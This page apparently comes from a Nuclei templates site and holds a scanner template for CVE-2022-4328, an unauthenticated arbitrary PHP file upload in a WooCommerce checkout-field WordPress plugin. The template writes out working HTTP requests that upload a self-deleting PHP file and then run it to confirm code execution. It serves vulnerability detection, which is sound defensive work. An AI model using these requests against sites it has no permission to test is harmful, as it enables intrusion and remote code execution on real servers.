Skip to content
Nuclei Templates

WooCommerce Checkout Field Manager < 18.0 - Arbitrary File Upload

ID: CVE-2022-4328

Severity: critical

Author: theamanrawat

Tags: cve2022,cve,wp,n-media-woocommerce-checkout-fields,wpscan,rce,wordpress,wp-plugin,intrusive,najeebmedia,fileupload

Description

Section titled “Description”

The WooCommerce Checkout Field Manager WordPress plugin before 18.0 does not validate files to be uploaded, which could allow unauthenticated attackers to upload arbitrary files such as PHP on the server.

YAML Source

Section titled “YAML Source”
id: CVE-2022-4328


info:
  name: WooCommerce Checkout Field Manager < 18.0 - Arbitrary File Upload
  author: theamanrawat
  severity: critical
  description: |
    The WooCommerce Checkout Field Manager WordPress plugin before 18.0 does not validate files to be uploaded, which could allow unauthenticated attackers to upload arbitrary files such as PHP on the server.
  remediation: Fixed in version 18.0
  reference:
    - https://wpscan.com/vulnerability/4dc72cd2-81d7-4a66-86bd-c9cfaf690eed
    - https://wordpress.org/plugins/n-media-woocommerce-checkout-fields/
    - https://nvd.nist.gov/vuln/detail/CVE-2022-4328
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2022-4328
    cwe-id: CWE-434
    epss-score: 0.22681
    epss-percentile: 0.96077
    cpe: cpe:2.3:a:najeebmedia:woocommerce_checkout_field_manager:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: najeebmedia
    product: woocommerce_checkout_field_manager
    framework: wordpress
  tags: cve2022,cve,wp,n-media-woocommerce-checkout-fields,wpscan,rce,wordpress,wp-plugin,intrusive,najeebmedia,fileupload


variables:
  string: "CVE-2022-4328"


http:
  - raw:
      - |
        POST /wp-admin/admin-ajax.php?action=cfom_upload_file&name={{randstr}}.pHp HTTP/1.1
        Host: {{Hostname}}
        Content-Type: multipart/form-data; boundary=------------------------22728be7b3104597


        --------------------------22728be7b3104597
        Content-Disposition: form-data; name="file"; filename="{{randstr}}.php"
        Content-Type: application/octet-stream


        <?php echo md5("{{string}}");unlink(__FILE__);?>


        --------------------------22728be7b3104597--
      - |
        GET /wp-content/uploads/cfom_files/{{to_lower('{{randstr}}')}}.php HTTP/1.1
        Host: {{Hostname}}


    matchers-condition: and
    matchers:
      - type: word
        part: body_2
        words:
          - '{{md5(string)}}'
# digest: 4a0a0047304502200bd76c950096ce25b6c23db736eff24e4fdddb692b4862799a896e03416212d9022100bad60a908fd351556bed582b41490cb9ba10164a9c2e68ac29fd9470db5b6c3a:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2022/CVE-2022-4328.yaml"

View on Github